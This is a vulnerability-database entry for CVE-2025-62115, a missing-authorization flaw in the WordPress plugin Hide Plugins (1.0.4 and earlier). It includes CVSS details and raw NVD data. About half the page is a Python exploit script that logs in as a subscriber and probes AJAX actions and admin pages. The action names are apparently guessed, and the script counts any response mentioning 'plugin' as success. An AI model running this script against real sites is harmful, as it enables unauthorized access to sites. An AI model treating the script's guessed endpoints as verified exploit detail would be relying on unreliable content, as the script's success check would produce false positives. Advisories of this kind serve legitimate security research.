Security Vulnerability Report
中文
CVE-2025-62115 CVSS 4.3 MEDIUM

CVE-2025-62115

Published: 2025-12-31 17:15:46
Last Modified: 2026-04-23 15:34:34

Description

Missing Authorization vulnerability in ThemeBoy Hide Plugins hide-plugins allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hide Plugins: from n/a through <= 1.0.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Hide Plugins <= 1.0.4 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62115 PoC - WordPress Hide Plugins Missing Authorization # Target: WordPress site with Hide Plugins plugin <= 1.0.4 import requests import sys from urllib.parse import urljoin def exploit_cve_2025_62115(target_url, username, password): """ Exploit for Missing Authorization vulnerability in Hide Plugins This PoC demonstrates accessing hidden plugin information with low-privileged user """ session = requests.Session() # Step 1: Login with low-privilege user (subscriber role) login_url = urljoin(target_url, 'wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Step 2: Attempt to access hidden plugin list via AJAX endpoint ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php') # Common Hide Plugins AJAX actions actions = [ 'hide_plugins_get_list', 'get_hidden_plugins', 'hide_plugins_list', 'hp_get_plugins', 'hide-plugins-get-list' ] for action in actions: ajax_data = { 'action': action, 'nonce': '' # May not be required due to missing authorization } response = session.post(ajax_url, data=ajax_data) if response.status_code == 200: print(f"[+] Action '{action}' returned response:") print(response.text[:500]) if 'plugins' in response.text.lower() or 'plugin' in response.text.lower(): print("[!] Potential vulnerability confirmed - plugin list accessible") return True # Step 3: Try direct plugin admin page access admin_pages = [ 'admin.php?page=hide-plugins', 'admin.php?page=hide_plugins', 'options-general.php?page=hide-plugins' ] for page in admin_pages: page_url = urljoin(target_url, f'wp-admin/{page}') response = session.get(page_url) if response.status_code == 200 and 'plugin' in response.text.lower(): print(f"[+] Admin page accessible: {page_url}") return True print("[-] Vulnerability not confirmed or target not vulnerable") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com/ subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_62115(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62115", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:46.323", "lastModified": "2026-04-23T15:34:34.187", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThemeBoy Hide Plugins hide-plugins allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hide Plugins: from n/a through <= 1.0.4."}, {"lang": "es", "value": "Vulnerabilidad por ausencia de autorización en ThemeBoy Hide Plugins permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Hide Plugins: desde n/a hasta 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hide-plugins/vulnerability/wordpress-hide-plugins-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}